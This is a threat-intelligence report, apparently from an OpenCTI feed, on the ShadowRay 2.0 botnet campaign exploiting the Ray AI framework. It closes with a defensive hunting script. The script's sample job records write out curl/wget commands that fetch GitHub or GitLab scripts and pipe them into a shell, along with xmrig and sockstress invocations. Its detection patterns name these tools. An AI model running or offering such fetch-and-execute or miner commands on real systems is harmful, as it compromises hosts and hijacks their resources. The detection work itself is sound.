
ShadowRay 2.0: Active Global Campaign Hijacks Ray AI Infrastructure Into Self-Propagating Botnet

NetmanageIT OpenCTI - opencti.netmanageit.com




SUMMARY :

A global hacking campaign dubbed ShadowRay 2.0 has been discovered, exploiting a vulnerability in the Ray AI framework to seize control of computing clusters and create a self-replicating botnet. The attackers use GitLab and GitHub for payload delivery, leveraging AI-generated code to adapt their methods. The campaign has evolved from simple cryptojacking to a sophisticated multi-purpose botnet capable of DDoS attacks and data exfiltration. The operation targets exposed Ray clusters worldwide, utilizing DevOps-style infrastructure for real-time malware updates. This campaign highlights the growing attack surface in AI workloads and the risks associated with disputed vulnerabilities.

OPENCTI LABELS :

self-propagation, devops, cve-2023-48022, ddos, xmrig, data exfiltration, botnet, cryptojacking, ai infrastructure, sockstress, ray framework


AI COMMENTARY :

1. Introduction to ShadowRay 2.0: The security community has recently uncovered ShadowRay 2.0, a global hacking campaign targeting exposed Ray AI clusters worldwide. By exploiting a critical vulnerability in the Ray framework identified as CVE-2023-48022, attackers have seized control of computing resources to establish a self-replicating botnet that leverages AI workloads for malicious gain.

2. Exploitation of the Ray Framework Vulnerability: Researchers traced the intrusion vector to an unpatched flaw in the Ray framework that enables remote code execution. ShadowRay operators deliver payloads via compromised GitLab and GitHub repositories, where they host AI-generated code modules. These modules adapt dynamically to evade detection and maintain persistence across cluster nodes.

3. Infrastructure and DevOps-Style Delivery Methods: The campaign utilizes DevOps methodologies to orchestrate real-time updates and continuous deployment of malware. Leveraging containerized environments and CI/CD pipelines familiar to AI development teams, attackers inject malicious scripts that download and execute the xmrig cryptominer, or deploy modified sockstress tooling to probe network resilience in preparation for future DDoS campaigns.

4. Evolution from Cryptojacking to a Multi-Purpose Botnet: Initially focused on cryptojacking, ShadowRay 2.0 has evolved into a versatile botnet capable of launching volumetric DDoS attacks and performing covert data exfiltration. AI-enhanced code generation allows operators to swap modules on the fly, transitioning seamlessly between generating cryptocurrency revenue and harvesting sensitive information from targeted clusters.

5. Self-Propagation Mechanics and Attack Vectors: Self-propagation is achieved through lateral movement within compromised clusters. Once a foothold is established, the botnet scans for additional Ray nodes, exploiting similar misconfigurations or unpatched instances. This automated spread strikes a balance between stealth and speed, ensuring the botnet remains concealed until critical mass is reached.

6. Implications for AI Infrastructure Security and Mitigation Strategies: ShadowRay 2.0 underscores the expanding attack surface in AI infrastructure and the urgency of patch management. Defenders should prioritize remediation of CVE-2023-48022, enforce strict access controls on repository integrations, implement network segmentation to limit lateral movement, and deploy threat-hunting capabilities to detect anomalous DevOps activity. Vigilance and proactive security measures are essential to protect next-generation AI workloads from sophisticated botnet campaigns.
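As an added defender-side example (not part of the OpenCTI report or of the Ray project), the following Python hunting script applies the report's indicators to Ray job records: it flags job entrypoints that fetch a payload from GitLab/GitHub and pipe it into a shell, or that invoke xmrig or sockstress, and separately checks a `ray start` command line for a dashboard bound to all interfaces (`--dashboard-host` is a real `ray start` flag; the job records, job ids and URLs below are constructed samples).

```python
import re

# Constructed sample job-submission records (not real Ray output): each is
# (job_id, entrypoint command), as a defender might export from the Ray
# Jobs API or dashboard for review. Ids and URLs are placeholders.
SAMPLE_JOBS = [
    ("raysubmit_01", "python train.py --epochs 10"),
    ("raysubmit_02", "curl -s https://gitlab.com/example/raw/loader.sh | sh"),
    ("raysubmit_03", "bash -c 'wget https://raw.githubusercontent.com/x/y/main/run.sh -O- | bash'"),
    ("raysubmit_04", "./xmrig --config=config.json"),
    ("raysubmit_05", "python sockstress.py"),
]

# Hunting heuristics derived from the report: payload delivery from
# GitLab/GitHub piped straight into a shell, the xmrig miner, and sockstress.
PATTERNS = {
    "remote_fetch_to_shell": re.compile(
        r"(curl|wget)\b.*https?://(gitlab\.com|github\.com|raw\.githubusercontent\.com)\S*"
        r".*\|\s*(ba)?sh\b", re.I),
    "cryptominer": re.compile(r"\bxmrig\b", re.I),
    "dos_tool": re.compile(r"\bsockstress\b", re.I),
}


def classify_entrypoint(cmd: str) -> list[str]:
    """Return the names of every heuristic that matches a job entrypoint."""
    return [name for name, pat in PATTERNS.items() if pat.search(cmd)]


def hunt(jobs):
    """Return (job_id, [hits]) for each job record that triggers a heuristic."""
    findings = []
    for job_id, cmd in jobs:
        hits = classify_entrypoint(cmd)
        if hits:
            findings.append((job_id, hits))
    return findings


def dashboard_exposed(ray_start_cmd: str) -> bool:
    """True if a `ray start` command binds the dashboard (and with it the Jobs
    API) to every interface via --dashboard-host, the exposure that lets an
    unauthenticated remote party submit jobs. Parsing here is our own."""
    m = re.search(r"--dashboard-host[= ]+(\S+)", ray_start_cmd)
    return bool(m) and m.group(1).strip("'\"") in ("0.0.0.0", "::")


if __name__ == "__main__":
    for job_id, hits in hunt(SAMPLE_JOBS):
        print(job_id, hits)
    print("dashboard exposed:", dashboard_exposed("ray start --head --dashboard-host=0.0.0.0"))
```

Feed `hunt()` the real entrypoint list from your cluster's job records; a job that fetches a script from a public repository and executes it unseen is a first-tier triage item under this campaign.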



